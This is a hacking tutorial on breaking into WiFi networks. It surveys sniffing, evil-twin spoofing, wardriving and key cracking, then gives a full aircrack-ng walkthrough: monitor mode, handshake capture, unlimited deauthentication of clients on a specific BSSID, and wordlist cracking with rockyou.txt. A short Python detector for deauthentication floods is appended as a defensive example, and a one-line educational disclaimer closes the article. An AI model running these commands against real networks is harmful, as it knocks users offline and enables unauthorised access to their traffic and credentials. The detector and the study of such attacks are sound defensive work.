WiFi Hacking 101


Wireless hacking has been greatly simplified by the numerous hacking tools freely available on the internet. To some, this is as simple as spelling out their name, but to many it is still a daunting task. This article aims to give you a better understanding of how wireless networks are secured and how hackers exploit insufficient WiFi security and take advantage of weak user credentials.

How do hackers hack WiFi you ask? Well, in one or more of the following ways:

  1. Sniffing: the hacker captures the packets transmitted between the router and the various devices. The captured packets are later subjected to a brute-force attack that reveals the credentials they carry. If the packets are heavily encrypted, it will take some time for them to be deciphered, but eventually they will be.

  2. Spoofing: most smartphones and laptops automatically reconnect to networks they have joined before, which saves us from re-establishing the connection manually (because we're too lazy to keep doing it ourselves). Hackers exploit this feature in a brilliant yet simple way: set up a new access point with a stronger signal using the same SSID as the legitimate router. Devices automatically connect to the newly set-up access point, enabling the hacker to monitor all of their incoming and outgoing traffic.

  3. Wardriving: wardriving, or access point mapping, involves spotting and exploiting wireless local area networks while driving around in a car, typically with a laptop, a wireless network card and an antenna for signal gain. Most organizations with wireless networks broadcast signals beyond their office premises, and those signals can be picked up by hackers and used to intrude into the organizational network.

  4. Encryption cracking: routers encrypt all data they send and decrypt received data with the corresponding key. The three main security protocols supported by Wi-Fi routers for securing wireless networks are WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access) and WPA2 (Wi-Fi Protected Access II). WEP and WPA are the two basic options for encrypting your wireless communication, but they have weaknesses that cybercriminals can easily exploit. WPA2, on the other hand, is much more secure, as it provides a stronger encryption mechanism through the use of AES (Advanced Encryption Standard). However, WPA2 can also be cracked with the help of tools and software. WPA3 (Wi-Fi Protected Access III) is a new and improved security protocol for securing wireless connections, but widespread adoption is still expected to take some time.

How then do we hack wireless networks? This involves cracking the WEP/WPA keys using the following tools:

  • A wireless network adapter capable of injecting packets
  • Wireshark - to capture traffic between the router and devices
  • Aircrack-ng suite - this powerful toolset is installed by default in the Kali Linux distro and includes airmon-ng and airodump-ng among others

In this demonstration, the following steps will be followed:

  • Configure WiFi adapter to monitor mode

  • Information gathering on nearby access points, i.e. MAC address, channel number, authentication type and the clients/stations connected to a specific access point

  • De-authenticate a client connected to a specific access point so we can capture a four-way handshake

  • Capture the four-way handshake

  • Brute-force the captured handshake

Without further ado, let the games begin!

a. Run the following commands to check your wireless adapter settings, check for any processes that may conflict with the adapter, and kill those processes:

iwconfig
airmon-ng check
airmon-ng check kill

b. Enable monitor mode on the wireless adapter to sniff wireless connections. N.B.: specify your own wireless adapter's interface name, e.g. wlan0. airmon-ng reports the name of the monitor interface it creates (often wlan0mon); use whatever name it reports in the commands that follow.

airmon-ng start wlan0

c. After setting it to monitor mode, test whether the adapter is capable of packet injection:

aireplay-ng --test wlan0

d. At this point, take note of the target router's BSSID, the channel it is on and its name. Next, capture the traffic and the 4-way authentication handshake for the access point of interest:

airodump-ng -w capture -c 2 --bssid E8:65:D4:CB:E3:A0 wlan0

where:

  1. -w = write to a file named 'capture'
  2. -c = channel
  3. --bssid = filter access points by BSSID

e. With a client associated to the access point, de-authenticate the connected users to prompt them to reconnect to the router. The 4-way authentication handshake we're interested in is generated by that reauthentication, and we use it to crack the WPA/WPA2 pre-shared key.

aireplay-ng --deauth 0 -a E8:65:D4:CB:E3:A0 wlan0

where:

  1. --deauth = send deauthentication frames
  2. 0 = the number of deauths to send (0 means unlimited)
  3. -a = the MAC address of the access point

f. When the 4-way handshake has been captured, run aircrack-ng to crack the pre-shared key. You can use a common wordlist like rockyou.txt to crack simple passwords*:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b E8:65:D4:CB:E3:A0 capture.cap

*aircrack-ng cracks passwords on the machine's CPU, which is much slower; cracking more complex passwords may require a tool like hashcat, which uses the GPU for faster cracking.
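On the defensive side, the deauthentication burst in step e is the most visible signature of this attack. The following is an added example, not part of the original article: a small Python detector that parses raw 802.11 management frames, picks out deauthentication frames and flags a BSSID when more than a threshold of them arrive inside a sliding time window. The sample frames, timestamps and threshold are constructed for illustration; a real deployment would feed it frames from a monitor-mode capture.

```python
import struct
from collections import defaultdict, deque

MGMT_TYPE, DEAUTH_SUBTYPE = 0, 12
AP = bytes.fromhex("E865D4CBE3A0")   # BSSID used in the article's walkthrough
BCAST = b"\xff" * 6

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)

def parse_mgmt(raw: bytes):
    """Return (subtype, addr1, addr2, bssid, reason) for a management frame,
    None for anything else; reason is decoded only for deauthentication."""
    if len(raw) < 24:
        return None
    fc = raw[0]   # bits 0-1 version, 2-3 type, 4-7 subtype
    if fc & 0x03 != 0 or (fc >> 2) & 0x03 != MGMT_TYPE:
        return None
    subtype, reason = (fc >> 4) & 0x0F, None
    if subtype == DEAUTH_SUBTYPE and len(raw) >= 26:
        reason = struct.unpack_from("<H", raw, 24)[0]   # little-endian reason code
    return subtype, mac_str(raw[4:10]), mac_str(raw[10:16]), mac_str(raw[16:22]), reason

def detect_deauth_flood(frames, window_s=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_bytes). Returns the BSSIDs
    that saw more than `threshold` deauth frames inside any `window_s` span."""
    recent, flagged = defaultdict(deque), set()
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] != DEAUTH_SUBTYPE:
            continue
        q = recent[parsed[3]]
        q.append(ts)
        while q and ts - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) > threshold:
            flagged.add(parsed[3])
    return flagged

def _frame(subtype, a1, a2, a3, body=b""):
    """Constructed test vector: 24-byte management header plus body."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    return fc + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body

# Constructed sample: one beacon, then eight broadcast deauths carrying the AP's
# address (reason code 7 = class 3 frame received from a non-associated station).
SAMPLE = [(0.0, _frame(8, BCAST, AP, AP))] + [
    (0.1 * i, _frame(DEAUTH_SUBTYPE, BCAST, AP, AP, struct.pack("<H", 7)))
    for i in range(1, 9)
]
```

Running detect_deauth_flood(SAMPLE) flags E8:65:D4:CB:E3:A0, while a handful of deauths spread over a long period (normal roaming or idle timeouts) stays below the threshold.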

Disclaimer: This article has been written for educational purposes only. Please do not use this for malicious intent.
